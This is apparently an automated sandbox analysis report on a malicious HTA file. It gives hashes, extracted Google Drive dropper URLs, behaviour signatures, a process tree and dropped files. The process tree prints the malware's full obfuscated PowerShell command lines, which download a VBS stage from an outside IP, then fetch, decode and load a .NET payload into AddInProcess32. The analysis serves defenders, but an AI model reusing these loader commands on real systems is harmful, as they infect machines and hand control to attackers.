Analysis

  • max time kernel
    134s
  • max time network
    102s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-10-2024 02:14

General

  • Target

    c96daaf1a1dc9722c4a06193e1d651b4604384d0afd2eba041cb67bbbc4a24bd.hta

  • Size

    130KB

  • MD5

    1fd620bfc1434f416a86c5ab0ca98c41

  • SHA1

    d2aab0e25bfa3e35f8ed5e8c4a772b7c5c083dcf

  • SHA256

    c96daaf1a1dc9722c4a06193e1d651b4604384d0afd2eba041cb67bbbc4a24bd

  • SHA512

    46aebd9323692bc22eaf4c5c615acccf73695a82812c0facec9f7017ef0304d48f76a84a1a8a021411e180ec357301c1a1e1c245a7178f73ef34ce13f89f2bc9

  • SSDEEP

    96:Eam73ELEyboOrLEy7oOBnN0qfaJdoP8oLSLweoOpWLEy+c7T:Ea23iJaC8hiT

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c96daaf1a1dc9722c4a06193e1d651b4604384d0afd2eba041cb67bbbc4a24bd.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3748
    • C:\Windows\SysWOW64\WIndOwspOwerSheLl\v1.0\pOwersHElL.exe
      "C:\Windows\SyStem32\WIndOwspOwerSheLl\v1.0\pOwersHElL.exe" "poWERsHEll.eXE -eX BYPaSS -nop -W 1 -C devicEcREDeNtiaLdEpLoYmENT ; Iex($(iEx('[SYStem.TEXT.eNcODiNg]'+[CHar]58+[chAr]58+'UtF8.gEtstRINg([sYStEm.ConVErt]'+[char]58+[CHAr]58+'FrombAse64sTRinG('+[CHaR]34+'JFJ2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdQUkNUUUdZQmxFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbnpCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTmUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREN6QnZFTkl4eXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpemspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienRmalYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0a0RVUk0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRSdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC40MC84ODgvc2VlYmVzdHRoaW5nc3dpdGhncmVhdG5ld3NnaXZlbm1lLnRJRiIsIiRlTlY6QVBQREFUQVxzZWViZXN0dGhpbmdzd2l0aGdyZWF0bmV3c2dpdmVubS52YlMiLDAsMCk7U3RhclQtU2xFRVAoMyk7U1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VlYmVzdHRoaW5nc3dpdGhncmVhdG5ld3NnaXZlbm0udmJTIg=='+[chAR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1076
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BYPaSS -nop -W 1 -C devicEcREDeNtiaLdEpLoYmENT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1960
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qszsit5c\qszsit5c.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1176
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES976D.tmp" "c:\Users\Admin\AppData\Local\Temp\qszsit5c\CSC15067A1B7C5D44B4B7671E64060251.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:376
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seebestthingswithgreatnewsgivenm.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3980
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdMZXhpbWFnZVVybCA9IHdMOGh0dHBzOi8vZHJpJysndmUuZ29vJysnZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHdMODtMZXh3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O0xleGltYWdlQnl0ZXMgPSAnKydMZXh3ZScrJ2JDbGllbnQuRG93JysnbmxvYWREYXRhKExleGltYWdlVXJsKTtMZXhpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jJysnb2RpbmddOjpVVEY4LkdldFN0cmluZyhMZXhpbWFnZUJ5dGVzKTtMZXhzdGFydEYnKydsYWcgPSB3TDg8PEJBU0U2NF9TVEFSVD4+d0w4O0xleGVuZCcrJ0ZsYWcgPSB3TDg8PEJBU0U2NF9FTkQ+PndMODtMZXhzdGFydEluZGUnKyd4ID0gTGV4aW1hZ2VUZXh0LkluZGV4T2YoTGV4c3RhcnRGbGFnKTtMZXhlJysnbmRJbmRleCA9IExleGltYWdlVGV4JysndC5JbmRleE9mKExleGVuZEZsYWcpO0xleHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBMZXhlJysnbmRJbmRleCAtZ3QgTGV4c3RhcnRJbmRleDtMZXhzdGFydEluZGV4ICs9ICcrJ0xleHN0YXJ0RmxhZy5MZW5ndGg7TGV4YmFzZTY0TGVuZ3RoID0gTGV4ZW5kSW5kZXggLSBMZXhzdGFydEluZGV4O0xleGJhc2U2NEMnKydvbW1hJysnbmQgPSBMZXhpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ0xleHN0YXJ0SW5kZXgsIExleGJhc2U2NExlbmd0aCk7TGV4YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoTGV4YmFzZTY0Q29tbWFuZC5Ub0NoYScrJ3JBcnJheSgpIDZNdCBGb3JFYWNoLU9iamVjdCB7IExleF8gfSlbLTEuLi0oTGV4YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtMZXhjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKExleGJhcycrJ2U2NFJldmVyc2VkKTtMZXhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoTGV4Y29tbWFuZEJ5dGVzKTtMZXh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TScrJ2V0aG9kKHdMOFZBSXdMOCk7TGV4dmFpTWV0aG9kLkludm9rZShMZXhudWxsLCBAKHdMOHR4dC5SRUVXUS84ODgvMDQuMDIyLjMuMjkxLy86cHR0aHdMOCwgd0w4ZGVzYXRpdmFkb3dMOCwgd0w4JysnZGVzYXRpdmFkb3dMOCwgd0w4ZGVzYXRpdmFkb3dMOCwgdycrJ0w4QWRkSW5Qcm9jZXNzMzJ3TDgsIHdMOGRlc2F0aXZhZG93TDgsIHdMOGRlc2F0aXZhZG93TDgsd0w4ZGVzYXRpdmFkb3dMOCx3TDhkZXNhdGl2YWRvd0w4LHdMOGRlJysnc2F0aXZhZG93TDgsd0w4ZGVzYXRpdmFkb3dMOCx3TDhkZXNhdGl2JysnYWRvd0w4LHdMODF3TDgnKycsd0w4ZGVzJysnYXRpdmFkb3dMOCkpOycpLnJFcGxhY2UoJ0xleCcsW1NUcmluZ11bQ0hBUl0zNikuckVwbGFjZSgoW0NIQVJdMTE5K1tDSEFSXTc2K1tDSEFSXTU2KSxbU1RyaW5nXVtDSEFSXTM5KS5yRXBsYWNlKChbQ0hBUl01NCtbQ0hBUl03NytbQ0hBUl0xMTYpLCd8JykgfCBpRXg=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2816
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('LeximageUrl = wL8https://dri'+'ve.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur wL8;LexwebClient = New-Object System.Net.WebClient;LeximageBytes = '+'Lexwe'+'bClient.Dow'+'nloadData(LeximageUrl);LeximageText = [System.Text.Enc'+'oding]::UTF8.GetString(LeximageBytes);LexstartF'+'lag = wL8<<BASE64_START>>wL8;Lexend'+'Flag = wL8<<BASE64_END>>wL8;LexstartInde'+'x = LeximageText.IndexOf(LexstartFlag);Lexe'+'ndIndex = LeximageTex'+'t.IndexOf(LexendFlag);LexstartIndex -ge 0 -and Lexe'+'ndIndex -gt LexstartIndex;LexstartIndex += '+'LexstartFlag.Length;Lexbase64Length = LexendIndex - LexstartIndex;Lexbase64C'+'omma'+'nd = LeximageText.Substring('+'LexstartIndex, Lexbase64Length);Lexbase64Reversed = -join (Lexbase64Command.ToCha'+'rArray() 6Mt ForEach-Object { Lex_ })[-1..-(Lexbase64Command.Length)];LexcommandBytes = [System.Convert]::FromBase64String(Lexbas'+'e64Reversed);LexloadedAssembly = [System.Reflection.Assembly]::Load(LexcommandBytes);LexvaiMethod = [dnlib.IO.Home].GetM'+'ethod(wL8VAIwL8);LexvaiMethod.Invoke(Lexnull, @(wL8txt.REEWQ/888/04.022.3.291//:ptthwL8, wL8desativadowL8, wL8'+'desativadowL8, wL8desativadowL8, w'+'L8AddInProcess32wL8, wL8desativadowL8, wL8desativadowL8,wL8desativadowL8,wL8desativadowL8,wL8de'+'sativadowL8,wL8desativadowL8,wL8desativ'+'adowL8,wL81wL8'+',wL8des'+'ativadowL8));').rEplace('Lex',[STring][CHAR]36).rEplace(([CHAR]119+[CHAR]76+[CHAR]56),[STring][CHAR]39).rEplace(([CHAR]54+[CHAR]77+[CHAR]116),'|') | iEx"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2552

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOwersHElL.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    066e045b3334b84b535ceefbf18c8314

    SHA1

    0564e776a1e80866ca7c14e8d50222b322d08cf0

    SHA256

    ea523f605afb3e8d3eaa38c950f73d327c809caf51f074f3f284a7b9f1f8fe22

    SHA512

    982a75c41c82ea470540dcfdd3c3f8bc215d8e6128bd209a80f91a6037a996a70d3ff9f28165dc0a2a5a51d59585001851e66e62771fcd95a74056f5aa9780e1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    78f1dee0874b0db4148950e0223193dd

    SHA1

    11d0a64238adb0d37de370efd92f569e39c83a07

    SHA256

    3c0354cdb895dade4a63e28afb226ff1c4f5db008e7f7e6152e864ac2377a52e

    SHA512

    1b92bedc4880028f803d6c0297f9c9cfae3c65b4f2b0a0adf462af4016ef4d5b866089562ea855f3732ecfd600377b0f0d38ea8e7e6e013c73f72c828a29fd94

  • C:\Users\Admin\AppData\Local\Temp\RES976D.tmp

    Filesize

    1KB

    MD5

    24ae5ccb9606eb1fe17e83fe71244eab

    SHA1

    43016d200a14b7aee5e0f42f735f7b4df5b896d4

    SHA256

    f16c1c11c7250d50e9232e957a37d96706d85e2f11c45e1291729124ad56aa29

    SHA512

    428e0bb70c924a06ea0774bc29b5a857c6f8e0756a20daba6e6026f6eb65bd78ea6e17e7639e385c60218fa73d44b28210845efdbbf4e41a84694ca65234c256

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_khtx3h4k.r23.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\qszsit5c\qszsit5c.dll

    Filesize

    3KB

    MD5

    da561b09d1b4d6a3e4bcdd092f6f5bb2

    SHA1

    9ece39bd24d6601bea62f5ff687d993d90e63fb1

    SHA256

    36d11500c0888178c1c3c8820447446de244fae1dbbb52bba8289e851c4f3328

    SHA512

    f850df14e0f88f680212738940cb831dd4f4bb86f88b290c8f49beaa2dc19812f6da26125667315598ec06b43756ed3c9576fc750e2765fd2480ca94776229e7

  • C:\Users\Admin\AppData\Roaming\seebestthingswithgreatnewsgivenm.vbS

    Filesize

    191KB

    MD5

    3b2dfe853b29b8f7c863a177c77b2e0a

    SHA1

    f15bcc4bab2d0f9d84c6e09947982d86c9719524

    SHA256

    605997c72f3ef670c71c934cbb9b9b989fb83be8e7e9303df63695ecbaca4d1e

    SHA512

    d32da36c3c5ba33b840f8a99e5c8a13df9761e6b84c7b11c1d91e2eabeb478d564ea9801f36a5099741a90bf19ac0f83e445a46d94192693eeb5cc55635557ff

  • \??\c:\Users\Admin\AppData\Local\Temp\qszsit5c\CSC15067A1B7C5D44B4B7671E64060251.TMP

    Filesize

    652B

    MD5

    14b1e7e5757676a7ecf8b42d38ab6b01

    SHA1

    604c77c402883090dc927944db2f27ea14f2cda3

    SHA256

    27d921065c13a2d19128d4d7c68babac16d987dcff1798ed2fd008f65c770c9a

    SHA512

    56260cdc2d68ff7e8d4925d9bbfa4ebb28baf91386e1847930140f35ff69baf4cfe39c731344d493d3f44d7e15c23226e7048ed59e4c8abf48643afa99e2d569

  • \??\c:\Users\Admin\AppData\Local\Temp\qszsit5c\qszsit5c.0.cs

    Filesize

    472B

    MD5

    ebe44eb3851718dda661ef08a5ae1f72

    SHA1

    fc84762887e0b10691ab43cb52f59169096936ec

    SHA256

    3c667a3bd30fef3aa5caf37fb56f20687efa429605d0412bad70f15890e9e6d4

    SHA512

    99a0db30aac98a290b73db9bfd3a5aa7f1aba22e5e2dcf2e73b5749f8ddcc01d4520d47b428f647ef622bfd893962c5efc55237b3cd5b2a95c186ecb41d7256e

  • \??\c:\Users\Admin\AppData\Local\Temp\qszsit5c\qszsit5c.cmdline

    Filesize

    369B

    MD5

    22df43d09f1d993fa94820efa8a37e2c

    SHA1

    290a85b5a4d8b83b3f2ad0a3b1986d89640fe9ae

    SHA256

    ac6d7d21c88fde9f5f047293e0a79dcb91c9fc8eb7a810de8ec3771b0d282822

    SHA512

    df901e4277fd43bc1dac985c01d3d5a1238d466d1489b277684975b70eeb9d0c9b55a72c4c5b6122e053928aa0fad5586f2445943879b9b7c8a9604b6a465726

  • memory/1076-65-0x0000000006790000-0x0000000006798000-memory.dmp

    Filesize

    32KB

  • memory/1076-81-0x00000000711E0000-0x0000000071990000-memory.dmp

    Filesize

    7.7MB

  • memory/1076-1-0x00000000028C0000-0x00000000028F6000-memory.dmp

    Filesize

    216KB

  • memory/1076-3-0x00000000711E0000-0x0000000071990000-memory.dmp

    Filesize

    7.7MB

  • memory/1076-2-0x00000000052F0000-0x0000000005918000-memory.dmp

    Filesize

    6.2MB

  • memory/1076-4-0x00000000711E0000-0x0000000071990000-memory.dmp

    Filesize

    7.7MB

  • memory/1076-19-0x0000000006210000-0x000000000625C000-memory.dmp

    Filesize

    304KB

  • memory/1076-74-0x00000000086E0000-0x0000000008C84000-memory.dmp

    Filesize

    5.6MB

  • memory/1076-73-0x00000000075B0000-0x00000000075D2000-memory.dmp

    Filesize

    136KB

  • memory/1076-72-0x00000000711E0000-0x0000000071990000-memory.dmp

    Filesize

    7.7MB

  • memory/1076-71-0x00000000711EE000-0x00000000711EF000-memory.dmp

    Filesize

    4KB

  • memory/1076-0-0x00000000711EE000-0x00000000711EF000-memory.dmp

    Filesize

    4KB

  • memory/1076-5-0x0000000005950000-0x0000000005972000-memory.dmp

    Filesize

    136KB

  • memory/1076-6-0x00000000059F0000-0x0000000005A56000-memory.dmp

    Filesize

    408KB

  • memory/1076-7-0x0000000005B10000-0x0000000005B76000-memory.dmp

    Filesize

    408KB

  • memory/1076-18-0x00000000061D0000-0x00000000061EE000-memory.dmp

    Filesize

    120KB

  • memory/1076-17-0x0000000005C00000-0x0000000005F54000-memory.dmp

    Filesize

    3.3MB

  • memory/1960-42-0x00000000077F0000-0x0000000007E6A000-memory.dmp

    Filesize

    6.5MB

  • memory/1960-44-0x0000000007210000-0x000000000721A000-memory.dmp

    Filesize

    40KB

  • memory/1960-48-0x00000000073F0000-0x0000000007404000-memory.dmp

    Filesize

    80KB

  • memory/1960-47-0x00000000073E0000-0x00000000073EE000-memory.dmp

    Filesize

    56KB

  • memory/1960-50-0x0000000007430000-0x0000000007438000-memory.dmp

    Filesize

    32KB

  • memory/1960-45-0x0000000007440000-0x00000000074D6000-memory.dmp

    Filesize

    600KB

  • memory/1960-49-0x0000000007500000-0x000000000751A000-memory.dmp

    Filesize

    104KB

  • memory/1960-43-0x00000000071B0000-0x00000000071CA000-memory.dmp

    Filesize

    104KB

  • memory/1960-46-0x00000000073B0000-0x00000000073C1000-memory.dmp

    Filesize

    68KB

  • memory/1960-29-0x0000000007040000-0x0000000007072000-memory.dmp

    Filesize

    200KB

  • memory/1960-41-0x0000000007080000-0x0000000007123000-memory.dmp

    Filesize

    652KB

  • memory/1960-40-0x00000000063F0000-0x000000000640E000-memory.dmp

    Filesize

    120KB

  • memory/1960-30-0x000000006DAA0000-0x000000006DAEC000-memory.dmp

    Filesize

    304KB

  • memory/2552-103-0x0000000007740000-0x00000000077DC000-memory.dmp

    Filesize

    624KB

  • memory/2552-102-0x00000000075E0000-0x000000000773A000-memory.dmp

    Filesize

    1.4MB

  • memory/2816-91-0x0000000005CB0000-0x0000000006004000-memory.dmp

    Filesize

    3.3MB